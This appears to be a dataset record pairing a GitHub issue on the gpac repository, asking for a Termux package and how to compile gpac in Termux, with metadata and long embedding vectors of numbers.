-0.007810321170836687, 0.010342197492718697, 0.0076178391464054585, 0.005052648484706879, 0.015916768461465836, -0.004397470038384199, 0.006562890950590372, -0.028472507372498512, -0.008402572944760323, 0.013769855722784996 ]
234
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Would like for `gpac` to be available as a Termux package: https://github.com/termux/termux-packages/issues/6708 Also, until it's officially available, how can I compile gpac from termux itself?
Add package for Termux
https://api.github.com/repos/gpac/gpac/issues/1776/comments
3
2021-05-05T13:15:05
2022-01-14T09:55:54Z
https://github.com/gpac/gpac/issues/1776
876,438,754
1,776
false
This is a GitHub Issue repo:gpac owner:gpac Title : Add package for Termux Issue date: --- start body --- Would like for `gpac` to be available as a Termux package: https://github.com/termux/termux-packages/issues/6708 Also, until it's officially available, how can I compile gpac from termux itself? --- end body ---
325
[ -0.030334239825606346, 0.018319211900234222, -0.025908952578902245, -0.022435471415519714, 0.033127859234809875, 0.025884229689836502, -0.020568938925862312, 0.05869069695472717, -0.021557830274105072, 0.04840622842311859, -0.035105641931295395, 0.016910040751099586, 0.009858010336756706, -0.0015590488910675049, -0.02548867277801037, 0.019678937271237373, -0.005290568340569735, -0.011934681795537472, 0.0056892153806984425, 0.023894086480140686, 0.02623034082353115, -0.024128947407007217, 0.035377584397792816, 0.012670169584453106, 0.03471008315682411, -0.019271019846200943, -0.013955728150904179, 0.01938227005302906, -0.004446920473128557, 0.011081762611865997, 0.01441309042274952, 0.0020612203516066074, -0.005735569633543491, -0.004020461346954107, 0.021001579239964485, 0.018516989424824715, 0.020840883255004883, 0.03606981039047241, -0.006971683818846941, 0.005896264221519232, -0.01103849895298481, 0.00261438125744462, -0.02221297100186348, -0.010123774409294128, -0.030334239825606346, 0.021743247285485268, 0.055822912603616714, 0.009511898271739483, -0.0010738741839304566, -0.023992974311113358, 0.04642844572663307, -0.03001285158097744, 0.011539124883711338, -0.005374005995690823, -0.01049460843205452, -0.01843046210706234, 0.04697233811020851, -0.023115333169698715, -0.004246051888912916, 0.021780330687761307, -0.016267262399196625, 0.023968253284692764, 0.0015196477761492133, 0.017120180651545525, 0.0026808225084096193, 0.029320627450942993, -0.009827107191085815, 0.04002537578344345, -0.001121000968851149, 0.036984533071517944, 0.0010607404401525855, 0.010710928589105606, -0.02838118001818657, -0.022917555645108223, 0.008887660689651966, -0.03332563489675522, 0.04000065103173256, 0.025303255766630173, -0.0028832361567765474, -0.014524340629577637, -0.06467349082231522, -0.00044809136306867003, -0.0277631226927042, 0.017898932099342346, -0.030680352821946144, 0.011916140094399452, 0.0035754600539803505, -0.056910693645477295, -0.05058179050683975, 0.03092757612466812, 0.021310606971383095, 0.021471302956342697, 0.04729372635483742, 0.024487420916557312, 0.09117577970027924, 0.03784981369972229, -0.013621977530419827, -0.0032478899229317904, -0.03379536047577858, -0.01051315013319254, -0.010420441627502441, -0.0011727632954716682, 0.016304345801472664, -0.027713678777217865, -0.010531691834330559, 0.01747865416109562, 0.017898932099342346, -0.02756534516811371, 0.01391864474862814, 0.03335035964846611, 0.01491989754140377, -0.010284469462931156, -0.00671209953725338, 0.000672909605782479, 0.010655303485691547, 0.03784981369972229, -0.016193095594644547, -0.0374789796769619, -0.013992811553180218, 0.02974090538918972, -0.037899259477853775, -0.007249809335917234, -0.03651481121778488, -0.04002537578344345, 0.0003741176624316722, 0.0027271767612546682, -0.00035190623020753264, 0.006508140824735165, -0.025056032463908195, 0.0007470764685422182, -0.0412120446562767, -0.007472309749573469, 0.028949793428182602, -0.02068018913269043, 0.02568645216524601, -0.01866532303392887, 0.003711432684212923, 0.05631735920906067, -0.0233378354460001, 0.017911294475197792, 0.0025881140027195215, -0.010772734880447388, 0.02047004923224449, -0.029988128691911697, 0.0026097458321601152, -0.007293073460459709, -0.02217588759958744, -0.004304767586290836, 0.01000016275793314, 0.02432672493159771, -0.004653969779610634, -0.0035291058011353016, 0.020791439339518547, -0.044574275612831116, 0.022324221208691597, -0.007330156862735748, 0.0030949206557124853, 0.012002668343484402, 0.014141145162284374, 0.018207961693406105, -0.00005548027911572717, 0.002926500281319022, 0.014808647334575653, -0.009314119815826416, -0.03322674706578255, -0.025908952578902245, 0.031150076538324356, 0.006477238144725561, -0.011773986741900444, 0.003930842969566584, 0.012694891542196274, -0.0005481393309310079, -0.023090612143278122, 0.006233105435967445, -0.022361304610967636, -0.0053369225934147835, 0.012905031442642212, 0.04625539109110832, -0.004385114647448063, -0.03349869325757027, -0.008937104605138302, -0.004882650915533304, -0.014994064345955849, -0.021891580894589424, 0.0038937595672905445, -0.0067059192806482315, 0.018047265708446503, -0.003723793663084507, 0.006582307629287243, -0.017738237977027893, 0.001280150725506246, -0.011131207458674908, -0.0010568775469437242, -0.0173797644674778, 0.04741733893752098, -0.015859344974160194, -0.0018835288938134909, 0.027688955888152122, -0.03560008481144905, -0.03001285158097744, -0.008349950425326824, 0.014165868051350117, 0.008906202390789986, 0.00203958828933537, -0.05522957816720009, 0.0296420156955719, 0.010142316110432148, 0.04165704548358917, 0.011594749987125397, -0.023387279361486435, -0.028183402493596077, -0.012268432416021824, -0.02694728784263134, -0.0063041821122169495, 0.008764049038290977, 0.002646829467266798, 0.03683619946241379, 0.006245466414839029, -0.020049771293997765, -0.023214222863316536, -0.0005087382160127163, 0.007039669901132584, 0.03767675906419754, -0.021792691200971603, -0.010247386060655117, 0.01352308876812458, 0.00867134053260088, 0.0021863768342882395, -0.029666738584637642, 0.019678937271237373, 0.049419842660427094, -0.002690093358978629, 0.046181224286556244, -0.007929672487080097, 0.029419515281915665, 0.0068975165486335754, 0.00408844742923975, 0.00431712856516242, -0.02857895754277706, 0.025463949888944626, -0.007466129492968321, 0.017762959003448486, 0.002079762052744627, -0.03967926278710365, 0.026378674432635307, -0.005967340897768736, 0.012991559691727161, 0.04828261584043503, -0.03072979673743248, -0.001204438740387559, -0.023115333169698715, -0.014561424031853676, 0.018652962520718575, -0.030161185190081596, 0.003674349281936884, 0.003062472678720951, 0.017466291785240173, -0.012373502366244793, 0.0034765710588544607, -0.02425255812704563, -0.025810062885284424, -0.019097963348031044, -0.001087007811293006, 0.018924906849861145, 0.00019468797836452723, -0.048628728836774826, 0.018690045922994614, 0.00474358769133687, -0.00010236570233246312, 0.005216401536017656, -0.00011588569759624079, -0.020902689546346664, -0.021483663469552994, 0.03535286337137222, -0.009858010336756706, 0.005710847210139036, 0.0006512776017189026, 0.02902396023273468, 0.03386952728033066, 0.01843046210706234, -0.04425288364291191, -0.019802547991275787, -0.014709757640957832, 0.007429045625030994, -0.0279361791908741, 0.029147570952773094, -0.0032108065206557512, -0.020296994596719742, -0.026255063712596893, 0.00872078537940979, 0.017936015501618385, 0.008949466049671173, -0.006829530466347933, 0.012917392887175083, 0.02238602750003338, 0.0018541711615398526, -0.002317714039236307, -0.017194347456097603, -0.008170714601874352, 0.020877966657280922, 0.006433974020183086, 0.022126441821455956, -0.009103980846703053, 0.0008220158633776009, -0.002940406557172537, 0.032757025212049484, -0.00720654521137476, 0.07411739975214005, -0.009839468635618687, 0.022509638220071793, 0.08751688152551651, -0.051323458552360535, -0.04806011542677879, 0.00964169017970562, 0.0018340842798352242, 0.026724787428975105, 0.0067059192806482315, -0.0364406444132328, -0.0350809171795845, -0.007478490471839905, 0.01686059683561325, 0.022126441821455956, -0.05424068868160248, -0.008393215015530586, 0.0067182802595198154, 0.009542801417410374, -0.017466291785240173, -0.05651513859629631, 0.00812745001167059, 0.019444074481725693, 0.029048681259155273, -0.0020272270776331425, 0.020704912021756172, -0.02786201238632202, 0.005030984524637461, -0.05804792046546936, -0.034462861716747284, 0.046082332730293274, 0.0640307143330574, -0.00826342310756445, 0.012435307726264, 0.016576290130615234, 0.015488510020077229, 0.019196853041648865, 0.03629231080412865, -0.018714766949415207, -0.03233674541115761, 0.044574275612831116, 0.02456158772110939, 0.01951824128627777, 0.0006682741804979742, -0.005735569633543491, 0.031323131173849106, -0.00579119473695755, -0.012515655718743801, 0.031669244170188904, 0.030853407457470894, -0.04499455541372299, -0.0013195518404245377, 0.022645611315965652, 0.013597255572676659, -0.03686092421412468, 0.03488314151763916, 0.028356457129120827, 0.010142316110432148, 0.05720736086368561, -0.028356457129120827, 0.009851829148828983, -0.008047102950513363, -0.029419515281915665, 0.0063536264933645725, 0.023387279361486435, -0.004437649622559547, -0.020012687891721725, -0.022015191614627838, 0.032658133655786514, 0.011384611018002033, 0.020902689546346664, -0.024685198441147804, -0.003102646442130208, -0.06358571350574493, 0.010859262198209763, 0.049172621220350266, -0.04694761335849762, 0.002240456873551011, 0.017602264881134033, 0.015130036510527134, 0.07668852061033249, -0.002577297855168581, -0.03226257860660553, -0.0061743902042508125, 0.020049771293997765, -0.039802875369787216, 0.01639087311923504, -0.04815900698304176, 0.00775043573230505, -0.003390043042600155, -0.014301840215921402, 0.028183402493596077, -0.0035754600539803505, 0.05354846268892288, -0.07095295190811157, 0.0010329278884455562, 0.014722119085490704, -0.004487094469368458, -0.0012453849194571376, -0.012731974944472313, -0.011205374263226986, 0.012651627883315086, -0.025884229689836502, 0.006569946650415659, -0.008968007750809193, -0.029147570952773094, -0.000393818219890818, 0.018554072827100754, 0.013634338974952698, -0.021557830274105072, 0.047095946967601776, -0.01496934238821268, 0.0021338420920073986, -0.0005153050879016519, -0.008968007750809193, -0.028232846409082413, -0.006291820667684078, 0.011050860397517681, 0.007354878820478916, 0.03804759308695793, 0.010080510750412941, 0.011328985914587975, -0.057800695300102234, 0.026996731758117676, -0.03794870153069496, 0.010667664930224419, -0.02885090373456478, 0.0354270301759243, -0.004239871632307768, -0.061607927083969116, -0.03325146809220314, 0.013720866292715073, -0.0067677246406674385, -0.029073404148221016, 0.006946961395442486, -0.0028059789910912514, 0.020111577585339546, 0.009307939559221268, -0.02882618084549904, -0.034017860889434814, 0.0002124571183230728, 0.023078249767422676, -0.027639511972665787, 0.023226583376526833, 0.030037572607398033, -0.001759917475283146, -0.01639087311923504, -0.005683034658432007, -0.010012524202466011, -0.009017452597618103, 0.037899259477853775, 0.06348682194948196, -0.015785178169608116, 0.001874258043244481, -0.03396841511130333, -0.016638096421957016, -0.01672462373971939, 0.0347595289349556, 0.021718524396419525, 0.008961827494204044, -0.02585950680077076, 0.008473562076687813, -0.0018835288938134909, -0.006298001389950514, 0.004428378771990538, 0.035105641931295395, 0.006662655156105757, -0.032485079020261765, 0.022744499146938324, 0.01454906351864338, -0.03144674375653267, 0.01693476364016533, -0.004823935218155384, -0.0040729958564043045, -0.04776344820857048, 0.01257128082215786, 0.026106730103492737, -0.0032818829640746117, -0.031397297978401184, -0.042027879506349564, -0.006854252889752388, -0.00678008608520031, 0.047615114599466324, 0.016304345801472664, 0.022633248940110207, -0.009375925175845623, -0.01391864474862814, 0.010778915137052536, -0.009035994298756123, -0.017503375187516212, 0.03624286502599716, -0.002611291129142046, -0.022262414917349815, -0.03399313986301422, -0.01105704065412283, 0.016304345801472664, -0.0260572861880064, 0.01045752502977848, 0.003541467012837529, -0.03404258191585541, 0.04296732693910599, -0.018084349110722542, -0.0034982028882950544, -0.013078087009489536, -0.00018155426369048655, -0.021879220381379128, 0.004653969779610634, -0.011205374263226986, -0.006335084792226553, 0.016353789716959, 0.0007609827443957329, 0.028331736102700233, -0.002648374531418085, -0.004644698929041624, -0.026897843927145004, -0.007787519134581089, 0.02252199873328209, -0.03802287206053734, 0.009944537654519081, 0.01199030689895153, -0.004576712381094694, 0.016440317034721375, 0.007459948770701885, -0.0037361548747867346, -0.026255063712596893, -0.041236765682697296, 0.029444238170981407, -0.020803799852728844, 0.013251143507659435, 0.016168372705578804, -0.027466455474495888, 0.007824602536857128, 0.004153343383222818, -0.006427793297916651, 0.03614397719502449, -0.008059464395046234, -0.00549452705308795, -0.037182312458753586, 0.009425370022654533, 0.008677520789206028, 0.022633248940110207, -0.004786851815879345, 0.023968253284692764, 0.00025301711866632104, -0.02159491367638111, -0.0021400225814431906, 0.050680678337812424, 0.010945790447294712, -0.0062207444570958614, 0.034734807908535004, 0.008331408724188805, -0.006996405776590109, -0.0022729048505425453, 0.033943694084882736, 0.01100141555070877, 0.003844314953312278, -0.03522925078868866, 0.007348698563873768, -0.0211251899600029, 0.01724379137158394, -0.011273360811173916, -0.011829611845314503, -0.011100304313004017, 0.01478392444550991, -0.001097051310352981, 0.016440317034721375, 0.045563165098428726, -0.023053528741002083, 0.016193095594644547, 0.030482573434710503, -0.011706001125276089, -0.0344134159386158, -0.038097038865089417, -0.004035912454128265, -0.007280712015926838, -0.019493520259857178, 0.026897843927145004, 0.022336581721901894, 0.0005446627619676292, -0.018096711486577988, 0.003023844212293625, -0.04232454672455788, -0.04336288198828697, -0.005265845917165279, -0.0048270258121192455, 0.0058684516698122025, 0.0033529596403241158, 0.022608527913689613, -0.015698648989200592, 0.019097963348031044, 0.0310017429292202, 0.05433957651257515, -0.02548867277801037, -0.017491014674305916, 0.0046045249328017235, 0.016341429203748703, -0.008560090325772762, -0.038715094327926636, 0.006804808042943478, 0.031248964369297028, -0.0027101801242679358, -0.01001870445907116, 0.019122686237096786, -0.02912284806370735, 0.004669420886784792, 0.07827074825763702, -0.0005234170821495354, -0.002602020278573036, -0.009202869608998299, 0.013102809898555279, 0.013139893300831318, 0.011242457665503025, 0.0212858859449625, -0.016786430031061172, -0.011712181381881237, -0.018442822620272636, -0.044648442417383194, -0.0025015859864652157, 0.010822178795933723, -0.009141064248979092, -0.014536702074110508, 0.010822178795933723, -0.012354960665106773, -0.03342452645301819, 0.015352536924183369, -0.020840883255004883, -0.029444238170981407, -0.05107623711228371, -0.0015822260174900293, 0.012719614431262016, 0.0013975815381854773, -0.04314038157463074, -0.013115170411765575, -0.015748094767332077, -0.01301628164947033, -0.0333998017013073, 0.0500873439013958, -0.01761462539434433, 0.0011248638620600104, -0.006325813941657543, -0.0001432154094800353, -0.022868111729621887, 0.03253452479839325, -0.019308103248476982, 0.002822975628077984, -0.010037247091531754, 0.008968007750809193, 0.01292975340038538, -0.034561749547719955, 0.01246621087193489, 0.027367565780878067, -0.01608184538781643, -0.005176228005439043, -0.012002668343484402, 0.0007629141910001636, -0.01740448735654354, -0.008986549451947212, 0.004100808408111334, -0.012188085354864597, 0.004731226712465286, -0.029345348477363586, -0.018319211900234222, -0.01195940375328064, 0.026156174018979073, -0.026798954233527184, 0.013152253814041615, 0.0023146236781030893, -0.014932258985936642, 0.00921523105353117, 0.0320153571665287, -0.03179285675287247, -0.0005427313735708594, -0.02279394492506981, -0.009561343118548393, -0.014104061760008335, -0.014672674238681793, -0.019889075309038162, -0.05696013942360878, 0.017083097249269485, 0.011557666584849358, -0.03129841014742851, -0.029716182500123978, -0.0010221118573099375, 0.026749510318040848, 0.011118846945464611, 0.017626987770199776, 0.05958069860935211, -0.014610868878662586, 0.0027132704854011536, 0.019777825102210045, 0.024302003905177116, -0.010890165343880653, -0.016786430031061172, -0.0028353368397802114, -0.013609616085886955, 0.005003171972930431, -0.029493682086467743, 0.0036898006219416857, -0.0007880227640271187, 0.0017475563799962401, -0.01658865064382553, -0.04541483148932457, 0.03431452810764313, -0.006848072167485952, -0.0054419925436377525, -0.00820779800415039, -0.018442822620272636, -0.007348698563873768, -0.013461282476782799, -0.021483663469552994, 0.005234943237155676, -0.03846787288784981, 0.012373502366244793, -0.020111577585339546, 0.0012052112724632025, -0.03498202934861183, -0.0022620889358222485, -0.02037116140127182, 0.009351203218102455, 0.0067677246406674385, 0.01194086205214262, 0.011829611845314503, 0.007398142945021391, -0.022460194304585457, -0.023189499974250793, 0.005948799196630716, 0.00554397189989686, 0.0219781082123518, 0.012194265611469746, -0.0182203222066164, 0.00241505797021091, 0.00011009141599060968, -0.013486005365848541, -0.0011426330311223865, 0.022324221208691597, -0.011298082768917084, -0.044376496225595474, 0.011811070144176483, -0.003921572118997574, -0.0004264593590050936, 0.025538118556141853, -0.006214563734829426, -0.01536489836871624, 0.0005747930845245719, 0.018900183960795403, -0.005531610455363989, -0.03710814565420151, 0.009783843532204628, -0.011792528443038464, -0.020259911194443703, -0.011835793033242226, 0.017046013846993446, 0.024920061230659485, 0.020519495010375977, -0.005445082671940327, -0.008726965636014938, 0.012157182209193707, -0.0006926101632416248, 0.015043509192764759, -0.019765464588999748, 0.000571702781599015, 0.007830782793462276, -0.006233105435967445, 0.013448921963572502, 0.004063725005835295, -0.014734480530023575, 0.0026391036808490753, 0.014029894955456257, -0.015995316207408905, 0.009944537654519081, 0.009993982501327991, 0.0030763789545744658, -0.0003337508242111653, -0.004487094469368458, -0.017144903540611267, -0.014660313725471497, 0.0070025864988565445, 0.0023470716550946236, -0.044648442417383194, 0.022942278534173965, -0.0011063221609219909, -0.021965747699141502, -0.002648374531418085, -0.0068357111886143684, -0.009715856984257698, 0.03228729963302612, -0.01771351508796215, 0.021013939753174782, 0.009777662344276905, 0.04074232280254364, 0.0065884883515536785, 0.0013751769438385963, -0.015760455280542374, 0.007608282379806042, 0.005386367440223694, -0.00018792797345668077, -0.01934518665075302, -0.0008915473008528352, 0.02180505357682705, -0.061410147696733475, 0.03557536378502846, -0.029765628278255463, 0.02650228701531887, -0.0017738237511366606, 0.006288730539381504, 0.01590878888964653, 0.0007482353248633444, -0.005469805095344782, -0.016971847042441368, 0.02909812703728676, -0.01546378806233406, 0.013115170411765575, 0.03028479591012001, -0.055377911776304245, 0.0044747330248355865, 0.03802287206053734, -0.01113738864660263, 0.01156384777277708, -0.009864190593361855, -0.0007872501737438142, 0.021965747699141502, 0.03278174623847008, 0.003556918352842331, 0.032658133655786514, -0.004774490837007761, 0.004205878358334303, -0.0061867511831223965, -0.010729470290243626, -0.00038049137219786644, 0.011897598393261433, 0.025760618969798088, -0.026156174018979073, 0.03342452645301819, -0.02360977977514267, -0.012361140921711922, -0.005374005995690823, -0.051521237939596176, -0.05206512659788132, -0.007886407896876335, -0.012707252986729145, -0.002651464892551303, 0.014845730736851692, 0.03396841511130333, 0.027540622279047966, 0.01843046210706234, 0.024709921330213547, 0.057800695300102234, -0.0038134120404720306, 0.0199261587113142, 0.005516159348189831, 0.0058684516698122025, 0.01812143251299858, -0.02613145299255848, 0.0277631226927042, 0.006563765928149223, -0.0016486671520397067, -0.013498365879058838, 0.006508140824735165, -0.014573785476386547, 0.019901437684893608, -0.04000065103173256, -0.04902428761124611, -0.0050680679269135, -0.034388694912195206, 0.013461282476782799, 0.013795033097267151, -0.024067141115665436, -0.012707252986729145, 0.04002537578344345, -0.025983119383454323, -0.0018186329398304224, -0.03382008150219917, -0.007082934025675058, -0.011736903339624405, 0.028727291151881218, 0.0035692795645445585, -0.012818503193557262, 0.01920921355485916, -0.011328985914587975, 0.00694078067317605, -0.024920061230659485, 0.001922157476656139, 0.0012090741656720638, 0.00458289310336113, -0.00598897272720933, -0.010890165343880653, 0.005389457568526268, 0.025810062885284424, 0.02551339566707611, 0.004221329931169748, -0.022917555645108223, -0.030878130346536636, -0.011112665757536888, -0.01545142661780119, 0.01866532303392887, -0.0001138576990342699, -0.027367565780878067, 0.023078249767422676, 0.01835629530251026, 0.009314119815826416, -0.02077907882630825, -0.019332824274897575, 0.011304263956844807, 0.010809818282723427, 0.0027070899959653616, -0.011291902512311935, -0.011230097152292728, -0.0398523174226284, -0.009876552037894726, -0.004440739750862122, 0.0071818227879703045, 0.026106730103492737, 0.04504399746656418, 0.005859180819243193, 0.01703365333378315, -0.011594749987125397, -0.0009116341825574636, 0.00456435140222311, 0.0025139471981674433, 0.020111577585339546, -0.008943285793066025, 0.026180896908044815, 0.011452597565948963, 0.004925914574414492, -0.008349950425326824, -0.017219070345163345, -0.014623230323195457, -0.012614544481039047, -0.018306849524378777, -0.0016502123326063156, -0.03995120897889137, -0.00860335398465395, -0.052955128252506256, 0.026279786601662636, -0.012731974944472313, 0.01148349978029728, -0.018628239631652832, 0.011971765197813511, 0.023560335859656334, -0.029592571780085564, 0.017762959003448486, -0.012175723910331726, -0.00819543655961752, -0.012157182209193707, -0.027342844754457474, -0.0027936180122196674, -0.01064294297248125, 0.0038937595672905445, 0.025389783084392548, -0.011947043240070343, 0.020704912021756172, 0.038517314940690994, 0.0194193534553051, 0.004876470193266869, 0.011230097152292728, -0.022200608626008034, 0.0033375080674886703, 0.008628076873719692, 0.000981165561825037, 0.006359807215631008, 0.00044925021938979626, -0.01775059849023819, -0.02200283110141754, 0.001199803315103054, 0.006384529639035463, 0.006909877993166447, 0.010321552865207195, 0.004221329931169748, 0.005577965173870325, -0.014104061760008335, -0.019889075309038162, 0.004895011894404888, 0.00021593368728645146, -0.005142234731465578, -0.005364735145121813, 0.012670169584453106, -0.007089114282280207, -0.02500658854842186, 0.03757786750793457, 0.0012747426517307758, 0.010228844359517097, -0.040964823216199875, 0.00432639941573143, 0.007045850623399019, 0.013856839388608932, 0.010599678382277489, -0.05028512328863144, 0.031941190361976624, -0.022163525223731995, 0.01577281579375267, 0.007688629906624556, -0.005815916694700718, -0.04867817461490631, -0.017355041578412056, 0.006458696443587542, -0.021038662642240524, -0.017392124980688095, -0.0012631540885195136, -0.003439487423747778, -0.008485923521220684, 0.044203441590070724, -0.03799814730882645, 0.013572532683610916, -0.012404405511915684, 0.008968007750809193, 0.013374755159020424, -0.03908592835068703, 0.018863100558519363, -0.018714766949415207, 0.005148415453732014, -0.007589740678668022, -0.002745718462392688, 0.004468552302569151, -0.026279786601662636, 0.0039030304178595543, 0.013906284235417843, 0.03063090704381466, -0.00807182490825653, 0.030803963541984558, -0.032213132828474045, 0.004882650915533304, 0.014808647334575653, 0.025661729276180267, 0.0026051104068756104, -0.0005577965057455003, 0.014240034855902195, 0.02477172762155533, 0.00969113502651453, -0.021520746871829033, -0.003315876005217433, -0.03283119201660156, -0.011638014577329159, 0.017552820965647697, 0.04145926609635353, 0.009011272341012955, -0.027417011559009552, -0.0204453282058239, -0.017960738390684128, 0.007268351037055254, -0.00695932237431407, 0.02122407965362072, -0.011007595807313919, -0.01740448735654354, -0.001372859231196344, 0.015859344974160194, 0.046997059136629105, -0.019542964175343513, 0.0071818227879703045, -0.027738401666283607, 0.002081307116895914, 0.0018109071534126997, -0.0149075360968709, 0.01666281744837761, -0.007830782793462276, 0.005142234731465578, 0.016057122498750687, -0.015921149402856827, -0.03011173941195011, -0.00964169017970562, 0.00149492546916008, 0.008869118988513947, 0.001249247812665999, 0.008040922693908215, 0.007459948770701885, -0.007688629906624556, -0.004276955034583807, 0.0016223997808992863, 0.017453931272029877, -0.006196022033691406, -0.0001337514113401994, -0.0017676431452855468, -0.008183075115084648, -0.007552657276391983, -0.01482100784778595, -0.04679927974939346, 0.016427956521511078, 0.001351999817416072, -0.041780658066272736, 0.004286225885152817, -0.0010143861873075366, -0.007558837998658419, 0.0005817462224513292, -0.009035994298756123, -0.017355041578412056, -0.003519834950566292, -0.017602264881134033, -0.018690045922994614, -0.010797456838190556, -0.0068851555697619915, 0.003519834950566292, 0.030087018385529518, -0.01856643334031105, -0.013671422377228737, -0.03164452314376831, 0.008498284965753555, 0.0077133518643677235, 0.011681278236210346, -0.014808647334575653, 0.006211473606526852, -0.011644194833934307, 0.008251061663031578, -0.011230097152292728, 0.003844314953312278, -0.00474358769133687, 0.020531855523586273, 0.014598507434129715, 0.01891254633665085, -0.003847405081614852, -0.007917311042547226, -0.0016919311601668596, -0.022423110902309418, 0.016613373532891273, 0.0033993138931691647, -0.023758113384246826, 0.014351285062730312, -0.03784981369972229, -0.010735651478171349, -0.0004990810994058847, 0.007323976140469313, -0.01297919824719429, -0.04173121228814125, 0.004891921766102314, -0.007738074287772179, 0.0021400225814431906, 0.005766472313553095, -0.03738009184598923, 0.0233378354460001, -0.01686059683561325, 0.006158938631415367, -0.008535368368029594, 0.005411089397966862, 0.01061203982681036, -0.0028476978186517954, -0.03829481452703476, -0.014190590009093285, -0.026378674432635307, 0.02415367029607296, 0.018455183133482933, 0.00970967672765255, -0.016885319724678993, -0.000610331364441663, -0.02558756247162819, 0.019048519432544708, -0.0010151587193831801, -0.01482100784778595, 0.0021400225814431906, -0.006644113454967737, -0.0025942944921553135, 0.007354878820478916, -0.009270856156945229, -0.00628564041107893, 0.04289316013455391, 0.03972870856523514, 0.019122686237096786, 0.019765464588999748, -0.008504465222358704, -0.006687377579510212, 0.02623034082353115, 0.00669355783611536, 0.015426703728735447, -0.024302003905177116, 0.0006122627528384328, 0.0076639074832201, -0.002317714039236307, -0.00528747821226716, -0.0035260154400020838, -0.012206627056002617, -0.0025788431521505117, -0.017725875601172447, -0.002330075018107891, 0.035105641931295395, 0.004446920473128557, 0.0019530602730810642, -0.007342517841607332, -0.029691461473703384, 0.01250329427421093, -0.004286225885152817, -0.012249890714883804, 0.019901437684893608, -0.015587398782372475, 0.019839631393551826, 0.009252314455807209, 0.014190590009093285, 0.024005336686968803, -0.003547647502273321, -0.032237857580184937, -0.006440154742449522, -0.0183933787047863, -0.004641608335077763, -0.023140056058764458, 0.032930079847574234, 0.033844806253910065, 0.02909812703728676, 0.007058211602270603, 0.013350032269954681, 0.026378674432635307, 0.01951824128627777, -0.005948799196630716, 0.012528016231954098, -0.0006875884719192982, -0.014647952280938625, 0.013795033097267151, 0.001453206641599536, -0.01798546127974987, -0.0056212288327515125, 0.004530358128249645, -0.004786851815879345, -0.009320300072431564, 0.012021210044622421, -0.008461201563477516, -0.014660313725471497, -0.02258380502462387, -0.014178228564560413, -0.01887546293437481, -0.030062295496463776, -0.01306572649627924, -0.01059349812567234, 0.0034054943826049566, 0.005982792470604181, 0.050779566168785095, 0.013572532683610916, 0.015599760226905346, 0.0004365027998574078, -0.013362393714487553, 0.013337671756744385, -0.008492103777825832, 0.024166030809283257, -0.01115593034774065, 0.01052551157772541, 0.009759120643138885, -0.03765203431248665, 0.0030022121500223875, -0.007571198977530003, 0.026972010731697083, -0.003479661187157035, 0.004456191323697567, -0.006551404949277639, -0.007898769341409206, 0.009054535999894142, 0.012404405511915684, -0.0030006670858711004, -0.00409771827980876, 0.024882977828383446, -0.011149749159812927, 0.008492103777825832, 0.014128784649074078, -0.010469886474311352, -0.016106566414237022, -0.003439487423747778, 0.008523006923496723, 0.010142316110432148, 0.02306588925421238, 0.005775743164122105, -0.013275865465402603, 0.0014060798566788435, -0.013275865465402603, -0.020482411608099937, -0.0025541207287460566, -0.003232438350096345, -0.02640339732170105, 0.007249809335917234, -0.010037247091531754, -0.021211719140410423, 0.008504465222358704, 0.0013574077747762203, 0.006563765928149223, -0.0047930325381457806, 0.008065644651651382, -0.00408844742923975, 0.0018340842798352242, -0.02729339897632599, 0.04116259887814522, -0.022868111729621887, -0.011879056692123413, 0.020272271707654, -0.010568775236606598, -0.015958232805132866, 0.003763967426493764, -0.03290535882115364, 0.018455183133482933, 0.006378348916769028, 0.021384773775935173, 0.0028801457956433296, -0.02395589090883732, -0.02357269637286663, 0.003631085157394409, -0.008504465222358704, 0.011909959837794304, 0.003312785876914859, -0.004289316013455391, -0.013201698660850525, -0.016835873946547508, -0.006090952083468437, 0.0037021618336439133, 0.018591156229376793, -0.03488314151763916, -0.014660313725471497, 0.004941366147249937, -0.025661729276180267, 0.0024660476483404636, -0.0075217545963823795, 0.0006250101723708212, 0.006749182939529419, 0.03246035799384117, 0.03569897636771202, 0.018504628911614418, 0.019604770466685295, -0.021075746044516563, 0.026625897735357285, -0.014499618671834469, -0.01351072732359171, 0.0016424866626039147, 0.004703414160758257, -0.019802547991275787, -0.020432965829968452, -0.0086898822337389, 0.052411239594221115, 0.0010329278884455562, 0.023770473897457123, 0.017762959003448486, 0.015513231977820396, 0.004246051888912916, 0.01577281579375267, -0.02909812703728676, 0.009703495539724827, 0.01018558070063591, -0.014190590009093285, -0.002560301451012492, 0.012744336389005184, -0.006563765928149223, 0.02360977977514267, 0.003016118425875902, -0.0010182489641010761, 0.002815249841660261, -0.00720654521137476, -0.00013829027011524886, -0.012181904166936874, 0.04173121228814125, 0.008485923521220684, 0.010111413896083832, -0.019641853868961334, 0.015130036510527134, -0.010012524202466011, -0.010883985087275505, -0.0002794776810333133, 0.035105641931295395, 0.013102809898555279, 0.0012979197781533003, 0.004162614233791828, 0.0005504570435732603, -0.028356457129120827, 0.0036063629668205976, 0.003101101377978921, -0.002000959822908044, -0.014104061760008335, 0.012639266438782215, -0.023659223690629005, -0.010408081114292145, 0.0024026967585086823, 0.01563684269785881, -0.03399313986301422, 0.027614789083600044, -0.016687540337443352, 0.015859344974160194, -0.014845730736851692, 0.012243710458278656, 0.0012662444496527314, 0.02163199707865715, -0.025711173191666603, 0.012410585768520832, 0.012614544481039047, -0.026255063712596893, 0.013733227737247944, -0.03001285158097744, -0.01194086205214262, 0.010723290033638477, -0.009654051624238491, 0.013312948867678642, -0.016811152920126915, -0.004215149208903313, 0.009610787034034729, -0.01110648550093174, -0.024994228035211563, -0.019913798198103905, -0.0021029391791671515, 0.007268351037055254, -0.012336418963968754, 0.04029732197523117, 0.004014280624687672, 0.014400729909539223, -0.00863425713032484, -0.01008669100701809, 0.03364702686667442, -0.01151440292596817, -0.017898932099342346, 0.0049722688272595406, -0.0031675423961132765, -0.019295740872621536, 0.0020890329033136368, 0.007361059542745352, -0.007231267634779215, -0.025908952578902245, 0.011576208285987377, -0.031224243342876434, 0.00964169017970562, 0.019332824274897575, -0.008424118161201477, 0.012033570557832718, 0.0001800091122277081, -0.017565181478857994, 0.021298246458172798, -0.009666412137448788, 0.020247548818588257, -0.015043509192764759, -0.016736984252929688, -0.005126783158630133, 0.016366150230169296, 0.007546476554125547, -0.005593416281044483, -0.00619911216199398, 0.025216728448867798, -0.0019885986112058163, 0.007076753303408623, 0.03038368560373783, 0.0034611194860190153, -0.0020473140757530928, -0.007478490471839905, -0.004233690910041332, -0.024104224517941475, -0.01627962291240692, -0.007979116402566433, 0.023214222863316536, 